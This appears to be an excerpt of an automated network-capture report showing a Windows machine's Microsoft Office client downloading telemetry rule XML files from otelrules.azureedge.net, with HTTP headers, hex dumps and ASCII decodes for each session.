                                                                                                                                      2024-10-07 01:23:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:12 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1389
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE10A6BC1"
                                                                                                                                      x-ms-request-id: 29f28342-e01e-003c-5d00-17c70b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012312Z-1657d5bbd48dfrdj7px744zp8s00000002fg00000000kkqd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:12 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      92192.168.2.44982913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:12 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:12 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:12 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1358
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                      ETag: "0x8DC582BE022ECC5"
                                                                                                                                      x-ms-request-id: 76165599-601e-000d-1a02-172618000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012312Z-1657d5bbd48sdh4cyzadbb374800000002mg00000000efgg
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:12 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      93192.168.2.44983213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:12 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:13 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1405
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE12B5C71"
                                                                                                                                      x-ms-request-id: 6f1c5b1d-901e-0048-485a-17b800000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012313Z-1657d5bbd48sdh4cyzadbb374800000002r0000000002m65
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:13 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      94192.168.2.44983513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:12 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:12 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1364
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE1223606"
                                                                                                                                      x-ms-request-id: 04600955-801e-00ac-55f4-16fd65000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012312Z-1657d5bbd48762wn1qw4s5sd3000000002p000000000cwh4
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:13 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      95192.168.2.44983313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:12 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:13 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1368
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                      ETag: "0x8DC582BDDC22447"
                                                                                                                                      x-ms-request-id: 173e0f62-801e-00a3-24fe-167cfb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012313Z-1657d5bbd48sdh4cyzadbb374800000002g000000000vc15
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:13 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      96192.168.2.44983113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:12 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:12 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1352
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                      ETag: "0x8DC582BE9DEEE28"
                                                                                                                                      x-ms-request-id: a9a45936-c01e-00a1-54f1-167e4a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012312Z-1657d5bbd48sqtlf1huhzuwq7000000002g000000000eb47
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:13 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      97192.168.2.44983413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:12 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:13 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1401
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                      ETag: "0x8DC582BE055B528"
                                                                                                                                      x-ms-request-id: 6bee43b5-001e-00a2-2106-17d4d5000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012313Z-1657d5bbd48xlwdx82gahegw4000000002wg00000000rkde
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:13 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      98192.168.2.44983913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:13 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:13 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1403
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                      ETag: "0x8DC582BDCB4853F"
                                                                                                                                      x-ms-request-id: 87e26173-201e-0051-15e7-167340000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012313Z-1657d5bbd487nf59mzf5b3gk8n00000002e000000000a807
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:13 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      99192.168.2.44984013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:13 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:13 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1366
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                      ETag: "0x8DC582BDB779FC3"
                                                                                                                                      x-ms-request-id: fcca05a5-501e-00a0-3202-179d9f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012313Z-1657d5bbd48brl8we3nu8cxwgn000000031g00000000n9ku
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:13 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      100192.168.2.44984113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:13 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:13 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1397
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                      ETag: "0x8DC582BDFD43C07"
                                                                                                                                      x-ms-request-id: 31868579-401e-008c-0af2-1686c2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012313Z-1657d5bbd48wd55zet5pcra0cg00000002t000000000asm6
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
